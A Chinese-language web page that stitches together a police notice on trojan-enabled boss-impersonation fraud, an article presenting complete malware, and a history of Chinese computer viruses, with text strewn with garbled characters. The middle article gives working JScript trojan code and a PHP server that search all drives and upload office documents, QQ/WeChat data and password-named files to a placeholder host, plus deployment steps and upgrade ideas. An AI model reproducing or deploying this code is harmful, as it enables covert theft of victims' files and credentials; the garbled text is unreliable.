期����,通過投放木馬病毒入侵公司電腦,從而冒充企業老板或客戶詐騙財會人員的“精準投毒”類電信網絡詐騙案件高發,造成相關企業巨大損失��。公安部對此高度重視����,部署各地公安機關迅速行動、重拳出擊����,成功偵破一批重點案件����,打掉一批詐騙團伙�。今日,公安部公布其中5起典型案例���,切實提高相關企業和人員防騙意識能力。
經查,此類詐騙案件中�����,詐騙分子通常將研發的木馬病毒偽裝成報稅工具、辦公軟件�、電子發票�����、涉稅文件等,通過發送電子郵件或推送下載鏈接等方式�����,誘騙企業人員點擊下載�,從而實施木馬攻擊�����。相關企業電腦一旦被木馬病毒入侵�,詐騙分子即可對電腦遠程監控,進而通過辦公文件���、聊天記錄等信息“精準”分析出企業基本情況和財會、管理�����、銷售等人員信息。隨后,詐騙分子通過遠程控制財會等人員的QQ�����、微信等社交軟件,在本人未發覺的情況下�,將用于詐騙的賬號添加至其好友列表����。時機成熟后,詐騙分子再將詐騙賬號“搖身一變”�����,偽裝成該企業老板或客戶的QQ、微信���,編造多種理由要求財會等人員轉賬匯款,從而實施詐騙���。作案過程中,詐騙分子無論是前期利用木馬病毒入侵電腦�,還是后期假冒老板�����、客戶要求轉賬匯款,都極為隱蔽���,迷惑性極強�����,甚至通過長期潛伏逐步摸清相關人員聊天習慣和企業財務審批流程�,稍有不慎就可能落入詐騙陷阱�����。
公安部刑偵局有關負責人表示,針對此類詐騙案件多發態勢,公安部已部署各地公安機關結合典型案例對企業相關人員開展反詐宣傳,指導排查清除釣魚軟件��,提升系統安全防護能力�,切實消除風險隱患���。同時����,公安機關提醒廣大企業和群眾切實提高防范意識���,定期對電腦進行殺毒��,一旦發現偽裝成好友的詐騙賬號立即刪除并更改聊天軟件登錄密碼。如遇到單位領導、企業老板、公司客戶在聊天軟件中要求轉賬匯款的���,一定要當面或者電話核實��,以免遭受財產損失����。
5起典型案例
案例1:2023年9月21日�����,浙江省臺州市天臺縣公安局接報一起電信網絡詐騙案件�����,受害人朱某系一科技公司財會人員�����,被詐騙分子冒充公司老板拉入微信群后轉賬1000余萬元���。案件發生以后�,浙江省市縣三級公安機關聯合成立專案組���,緊急開展資金止付和案件偵辦等工作�。接報后���,公安機關僅用6小時就抓捕到第1名涉案犯罪嫌疑人����,成功為該公司挽回損失600余萬元。后經專案組縝密偵查�����、深挖拓線���,在全國多地成功抓獲涉及該案資金����、通訊等環節的犯罪嫌疑人41名,實現全鏈條打擊��。
案例2:2023年10月25日����,福建省武夷山市公安機關接群眾鄭某報警稱�����,其公司財務張某疑似被電信網絡詐騙1480余萬元�。接報后,公安機關立即開展涉案資金止付挽損工作,當天成功止付凍結涉案資金930余萬元���,涉及529個賬戶。經查�����,案發前��,詐騙分子通過對張某電腦投放木馬病毒程序實現遠程控制,進而將其微信好友中的公司老板賬號秘密刪除����,再將假老板微信添加為其好友����。隨后�,假老板將張某拉入一微信工作群�����,讓張某提前支付合作公司貨款�,從而實施詐騙����。目前,全案共抓獲犯罪嫌疑人51名�,打掉黑灰產團伙8個��,累計挽回損失1200余萬元。
案例3:2024年5月22日�����,安徽省阜陽市公安機關接到某公司人員報警稱���,公司財務疑似被電信網絡詐騙�����。經查,該公司財務王某在工作微信群中下載運行一不明文件后,電腦被植入木馬病毒。境外詐騙分子通過木馬病毒遠程控制王某電腦,秘密竊取相關信息,利用偽裝的“公司領導”微信號要求其向指定賬戶轉賬���。王某信以為真,向該賬戶轉賬100萬元���,直至公司領導詢問時才發覺被騙。案發后,阜陽市公安機關第一時間開展追贓挽損、循線打擊���,成功為該公司挽回損失85萬元���,抓獲犯罪嫌疑人6名��。
案例4:2024年3月21日,山東省煙臺市公安局蓬萊分局海港海岸派出所接到國家反詐中心下發的見面勸阻指令:轄區內一公司存在被騙風險。接指令后�����,派出所民警立即開展見面勸阻工作。據悉,該公司工作人員遲某偉安裝了一款在網上購買的激活軟件后�,其電腦被植入木馬病毒并被詐騙分子遠程控制���,自動進行打字���、發送消息等操作。隨后��,詐騙分子利用偽裝成公司工作人員的微信向會計發送信息,要求向指定賬戶轉賬100萬元���。了解情況后�����,民警迅速組織對該公司電腦進行木馬病毒查殺���,同時對相關人員開展反詐知識宣傳����,成功為企業避免財產損失。
案例5:2024年5月27日�����,上海市松江區公安機關接到一公司經理李某求助稱��,其公司員工疑遭遇電信網絡詐騙�。經了解���,該公司財務總監熊某當日收到一條微信好友申請����,頭像和姓名均為其公司老板。添加好友后��,對方以老板日常說話語氣與熊某聊天��,后以支付貨款為由要求其向指定公司賬戶轉賬498.6萬元��。熊某想起公安機關反詐宣傳中“轉賬前要當面或電話確認”的防范提示,并未倉促轉賬而是立即致電公司老板�����。因多次未聯系上老板��,熊某遂將相關情況告知李某����。隨后��,公安機關協助熊某與公司老板取得聯系,成功拆穿騙局,避免公司遭受財產損失�����。經查�,熊某公司電腦近日中了木馬病毒,詐騙分子通過木馬病毒逐步摸清公司人員和經營情況,偽裝潛伏后伺機實施詐騙。
來源:防騙每日電訊
責任編輯:柯學子
讀:在日常電腦使用中����,很多小伙伴都會從互聯網下載網站或是QQ���、微信等聊天軟件中進行傳輸安裝軟件����、文件等�����。略知網絡安全的朋友們都會比較謹慎所安裝的軟件是否安全����,比如說通過殺毒軟件殺毒�、通過對文件的后綴、圖標�����、大小等分析,那么這樣的操作真的就是安全的嗎�����?
相信大家都對遠程木馬有所了解�����,名氣最大的應該是灰鴿子遠程木馬,它就是通過后綴為exe文件誘導用戶點擊,從而造成個人隱私��、文件的泄漏甚至金錢損失�����。
隨著互聯網安全工具越來越成熟���,對之前的exe木馬文件的云查殺越發嚴格�����,基本上做過免殺的程序也挺不了多久就被發現,所以像這類的遠程木馬已經慢慢消失成為歷史�����。
但是道高一尺魔高一丈���,最新的遠程木馬通過新的途徑新的方式悄然出現����,它就是利用js代碼來獵取你的電腦文件,更為可怕的是它可以通過邏輯代碼自動地進入電腦文件中搜索預設好的文件后綴進行分析獲取,比如說代碼只想獲取你的聊天記錄�,那么它會通過檢索查找到QQ�、微信等數據庫文件上傳獲取�、也可以通過查找相冊等目錄獲取照片等隱私文件,危害還是非常大的,本期文章小君就對js木馬進行分析,看它是如何獲取文件的�。
首先js木馬的特點:
優點:
- 文件小����、js后綴善于隱藏�����,目前殺毒軟件對它用處不大,可完全通過360安全��。
- 危害大�����,可以自動搜索目標文件獲取����。
缺點:
QQ傳輸引導中馬時會自動改后綴名稱��,所以很大程度上是需要通過將js代碼進行壓縮后引導安裝�。
使用方法:
首先需要木馬使用者搭建一臺服務器����,當然也可以是虛擬空間、vps等都是可以的���,然后搭建PHP環境,大家都知道像灰鴿子這類遠程木馬都有客戶端和服務端兩部分���,那么js木馬同樣也有,需要在PHP環境下上傳服務端代碼server.php文件��,在網站目錄下新建一個目錄upload用于獲取中馬者的隱私文件����,接下來就是將js代碼也就是木馬的客戶端發送給被控者引導點擊,如果成功點擊���,遠程服務器將會開始不斷收到上傳的隱私文件�����。
代碼分享:
js木馬客戶端代碼如下:
var __POSTURL__='http://www.xxx.com/server.php';
function UpFile(FilePath, FileName) {
var Stream=new ActiveXObject('ADODB.Stream');
Stream.Type=1;
Stream.Open();
Stream.LoadFromFile(FilePath);
var XHR=new ActiveXObject('Msxml2.XMLHTTP' || 'Microsoft.XMLHTTP');
XHR.open('POST', __POSTURL__, false);
XHR.setRequestHeader('fileName', FileName);
XHR.setRequestHeader('enctype', 'multipart/form-data');
XHR.send(Stream.Read());
Stream.Close();
return XHR.responseText
}
function GetDriveList() {
var fso=new ActiveXObject("Scripting.FileSystemObject");
var e=new Enumerator(fso.Drives);
var re=[];
for (; ! e.atEnd(); e.moveNext()) {
if (e.item().IsReady) {
re.push(e.item().DriveLetter)
}
}
return re
}
function GetFolderList(folderspec) {
var fso=new ActiveXObject("Scripting.FileSystemObject");
var f=fso.GetFolder(folderspec);
var fc=new Enumerator(f.SubFolders);
var re=[];
for (; ! fc.atEnd(); fc.moveNext()) {
re.push(fc.item())
}
return re
}
function GetFileList(folderspec) {
var fso=new ActiveXObject("Scripting.FileSystemObject");
var f=fso.GetFolder(folderspec);
var fc=new Enumerator(f.files);
var re=[];
for (; ! fc.atEnd(); fc.moveNext()) {
re.push([fc.item(), fc.item().Name])
}
return re
}
function Search(Drive) {
var FolderList=GetFolderList(Drive);
for (var i=0; i < FolderList.length; i++) {
Search(FolderList[i])
}
var FileList=GetFileList(Drive);
for (var i=0; i < FileList.length; i++) {
if (/\.(doc|docx|xls|xlsx)$/i.test(FileList[i])) {
UpFile(FileList[i][0], FileList[i][1])
}
}
}
function Load() {
var WMIs=GetObject("winmgmts:\\\\.\\root\\cimv2");
var Items=WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name='wscript.exe'");
var i=0,
rs=new Enumerator(Items);
for (; ! rs.atEnd(); rs.moveNext()) {
i++
}
if (i > 1) WScript.Quit(0);
Items=WMIs=i=rs=null;
var DriveList=GetDriveList();
for (var i=0; i < DriveList.length; i++) {
Search(DriveList[i] + ":\\\\")
}
}
Load();
PHP服務端代碼:
<?php
if($_SERVER['REQUEST_METHOD']=='POST'){
$fileName=uniqid(rand()) . '_' . iconv('utf-8', 'gbk', $_SERVER['HTTP_FILENAME']);
print_r(file_put_contents("uploads/{$fileName}", $HTTP_RAW_POST_DATA));
}
?>
還可以通過對js代碼的升級來實現更多新的功能
1���、獲取微信����、QQ等隱私信息
function GetQQWechat() {
var QQList=[];
var WechatList=[];
var QQPath="C:\\Users\\" + USERNAME+ "\\Documents\\Tencent Files"
var WechatPath="C:\\Users\\" + USERNAME+ "\\Documents\\WeChat Files"
var Patt=new RegExp(/[^\\]+$/);
if (FSO.folderExists(QQPath)) {
var QQFolderList=GetFolderList(QQPath);
if (QQFolderList) {
for (var i=0; i < QQFolderList.length; i++) {
var QQFolderStr=QQFolderList[i];
var QQResult=Patt.exec(QQFolderStr);
var QQ="";
if (QQResult) QQ=QQResult[0];
if (QQ=="All Users") continue;
QQList.push(QQ);
}
}
}
if (FSO.folderExists(WechatPath)) {
var WechatFolderList=GetFolderList(WechatPath);
if (WechatFolderList) {
for (var i=0; i < WechatFolderList.length; i++) {
var WechatFolderStr=WechatFolderList[i];
var WechatResult=Patt.exec(WechatFolderStr);
var Wechat="";
if (WechatResult) Wechat=WechatResult[0];
if (Wechat=="All Users") continue;
WechatList.push(Wechat);
}
}
}
return {"QQList":QQList, "WechatList":WechatList}
}
2、通過政策表達式獲取文件名含"賬號"�����、"密碼"�、"account"、"password"等文件
if (/((賬號|密碼|password|passwd|account)+(.*)*\.(txt|doc|docx|xls|xlsx)$)|(\.(JPG|PNG)$)/.test(FileList[i][1])) {
UpFile(FileList[i][0], FileList[i][1])
}
3�、獲取目標電腦用戶名
function GetUserName() {
var WshNetwork=new ActiveXObject("WScript.Network");
var UserName=WshNetwork.UserName;
return UserName;
}
XHR.setRequestHeader('userName', USERNAME);
以上代碼僅供研究��,請勿非法利用!
結語:
看到這里是不是感覺自己的電腦并非那么的安全��,我們在日常使用中��,首先要有一定的安全意識�,任何文件的傳輸�����,不要不做分析就隨意雙擊打開�����,養成使用殺毒軟件查殺的習慣,雖然并不能保證完全被查殺�,但最起碼也能過濾百分之九十以上的木馬文件����,剩下的就要靠自己的分析和判斷����,莫名其妙來源文件不接���,圖標異常的不接�����、文件大小與所需要內容不對等的文件不接�����。感謝您閱讀本期網絡安全普及文章,如果本文對您有所幫助請關注點贊喲,如果在網絡安全中遇到問題請在評論區或私信留言���。
算機病毒盛行,網絡安全何去何從,中國網絡安全最深的刻痕是什么���?
阿里宕機事件?
騰訊玄武實驗室?
都不是���,中國網絡安全最深的刻痕是熊貓燒香。
2006年10月,一名網友在網上求助,自己電腦上以exe結尾的文件��,全變成了一張張熊貓燒香的圖片���。一個月后���,這個人們眼中的“小毛病”����,卻成為了威脅千余家企業和政府機構的“大毒瘤”���。
2006年11月中旬��,熊貓燒香的傳播速度急劇加快�;
12月����,病毒進入飛速變種期�;
2007年初��,南北十幾個省��,幾十萬臺電腦,被感染病毒。
這些被感染的電腦,無一不出現藍屏,頻繁重啟的現象���,系統硬盤中數據文件也遭到破壞。為此,很多公司正在洽談的合作�����,也因為病毒的插腳�����,而最終泡湯��,造成巨大的經濟損失。
網上對熊貓主人的討伐之聲,一浪高過一浪�,甚至有公司提出��,以價值5萬元的帆船做為獎勵,懸賞緝拿熊貓主人����。同時,2007年1月22日����,警方成立1·22專案組��,在網上佯裝殺毒軟件購買者,終于釣到了這個幕后黑手�,25歲的武漢男孩李俊����。
2月4日���,仙桃市公安局網監大隊�����,又將幫助李俊散播病毒并從中牟利的同學雷磊�,緝捕歸案���,將涉案人員服務器布控扣押���。
2月12日���,李俊將網站關閉�,熊貓燒香案終于告破。
而熊貓燒香的陰影�����,卻永遠留在了受害用戶的心中���,這個造成政府��、企業、個人網絡安全威脅的病毒,真的這么厲害嗎?
盛名之下����,其實難副�����。
據騰訊安全聯合實驗室的解釋,熊貓燒香在一定程度上的確有獨到之處����,在感染電腦后��,病毒會將自己和以exe結尾的文件綁定,但由于技術的不成熟,感染后的文件以熊貓燒香的圖片出現���,反倒刺激了普通用戶�,引發恐慌情緒�����。
其次�����,程序會對其他進程加以監視,發現游戲類進程啟動后����,立即盜取游戲的賬號密碼����,而當用戶發現中毒���,下載殺毒軟件后�,系統已經被病毒控制�����,殺軟要么把文件和病毒一起刪除���。
從技術上說�����,熊貓燒香本身并不高明,但當時的中國計算機技術還不成熟,許多殺毒軟件也存在很多漏洞����,再加上李俊的炫耀心理和半吊子技術����,將病毒做得明目張膽��,才造成了大規模的感染���,恐慌情緒的蔓延�。
而在十幾年的技術沉淀下��,病毒被做得越來越精巧����,木馬病毒就以高度的隱蔽性�,得到了眾多不法者的青睞,成為2019至2020威脅最大的病毒之一。
2018年��,一個名為“PhotoMiner”的木馬挖礦組織���,通過遠程操作用戶電腦“挖礦”����,就獲得8900萬人民幣利益�,成為2018上半年的“黃金礦工”,而感染了數十萬臺電腦的熊貓燒香�����,卻僅僅賺了幾十萬����。
木馬挖礦程序的危害之大,早已不是十幾年前可以想象的了�����,PhotoMiner是一個遍布全球的挖礦組織�����,而這里說的“礦”��,并不是自然界存在的天然礦產����,而是虛擬貨幣門羅幣之礦�。
PhotoMiner組織的挖礦活動,就是一種在區塊鏈經濟下,萌生的新型網絡犯罪活動。
區塊鏈��,簡單來說就是一種去中心化的記賬方法����,有人提議要繞過銀行����,讓每個人都擁有記賬的權利,為了鼓勵這種做法�,他制定了一個規則�����,以虛擬貨幣進行交易,人們可以自己記賬���,然后通過一種解數學題的競爭方法,來選拔提交賬本的資格��,最后成功提交者���,就可以獲得記賬獎勵����。
這個獲得獎勵的過程就被稱為“挖礦”,而運算數學題的計算機�����,就被稱為“礦機”��,而參與的人越多�����,涉及的虛擬貨幣數目越大,獎勵就越大�。
截止至2018年��,比特幣就從幾百元每枚躍升至4.8萬元每枚,巨大的利益誘惑下��,人們開始開發算力更高的計算機����,而一些心術不正者�,卻想到了利用別人的計算機,為自己挖礦。
就這樣,挖礦木馬應運而生��,和特洛伊木馬戰術一樣���,木馬進入電腦后極其不易被察覺��,它會一直潛伏著�����,讓你的電腦為他沒日沒夜地工作,使主機長期處于高負荷運轉,從而造成顯卡主板等內存不可逆的損害,直至報廢。
除此之外,挖礦這種不產生任何實體產物的活動��,還會消耗巨大的電力���,《焦耳》雜志研究表明�,比特幣挖礦在一年內消耗的電力,與愛爾蘭全國電力消費相當,挖礦耗電量占全球耗電量的0.3%左右���。
而在火絨的年度安全報告中顯示,挖礦木馬在危害性上排名第一��。
2018年是一個忙碌的年份����,除了PhotoMiner之外�����,在遼寧大連,名為tlMiner的挖礦木馬也大殺四方���,在一個月內�����,就感染了二十多萬臺電腦�,獲得2000萬枚各類數字貨幣�,非法獲利1500余萬元。
當初提出區塊鏈的人,恐怕怎么也想不到�,一個用來解決中心化記賬方式的嘗試�����,會被人加以利用,生出一條完整的黑色產業鏈。如果說挖礦病毒�����,還只能侵害有一定網絡知識的青壯年群體的話����,那么接下來的這個病毒,恐怕已經喪心病狂到。
對不會用智能產品的老人家��,都要薅一把羊毛的程度了�。
2019年,浙江新昌縣居民小朱,到公安局報案,原來小朱在5月份給外婆買了一部功能機,沒成想,兩個月后,小朱想查詢外婆話費,卻始終接受不到驗證碼���,然而其他短信卻接受正常,這是怎么回事?
民警接到報案后馬上組織查探�,終于在一家生產功能機主板的廠家處��,查到了一批插入了異常程序的主板,經過司法鑒定后發現,這些主板被植入了一種木馬程序,程序會對接收到的所有短信提取關鍵字�����,進行篩選�,攔截帶有驗證碼的短信,再將短信發送給一個叫“小吳”的人,而這個小吳,就是這場案件的關鍵��。
犯罪人小吳聲稱���,在一次領取平臺新人優惠券的時候����,他發現了“商機”�����,幾乎所有平臺都會發放優惠券���,然而廣大不會使用智能機的老人家們��,卻基本沒有領取過,這是一個巨大的市場空白��。
因此��,他想出了一個“絕妙”的辦法��,他和主板生產商談攏,承諾以主板三倍的市場價�����,讓生產商在主板中植入一段程序���,再和下游進行分工���,小吳負責比對電話號碼和驗證碼�,確認無誤后發送給“番茄平臺”,下游就會依靠這些信息�,在各大平臺進行新人注冊�,進行優惠券套現。
就這樣��,這個完整的黑色產業鏈����,獲取了巨大的利潤�����,僅僅是記錄某多多平臺的一頁紙上��,犯罪金額就超過了61萬。而時過一年����,全國31個省市自治區����,4500多種型號的功能機�����,500多萬臺手機���,都感染了這種“薅羊毛”病毒�。
如果不是有個愛較真的小朱��,很難說這條黑色產業鏈還會存在多久����?�;氐浆F實����,僅僅是今年5月以來���,就有2.5萬余個非法控制網絡攝像頭被查獲�,1500余套竊聽器材被收繳����。
當我們的社會治安越來越好,走夜路越來越安全的時候,一種新的犯罪活動正在悄然潛行,而這種犯罪已經從炫耀性計算機病毒“熊貓燒香”,演變到結合新經濟區塊鏈的挖礦木馬�����,現如今又出現了薅羊毛的功能機病毒����,可謂防不勝防。
我們早就不應該用老眼光,來看待新時代的安全威脅了���,但正如今年九月,反詐騙APP登上了應用商店下載榜首一樣,我國也在完善網絡安全防御的構建�,而作為一個并不在專業領域的普通人���,我們更應該給自己提個醒�,認清新型網絡技術性犯罪的危險性����。
像小朱一樣,保護好自己,也保護好家人��。
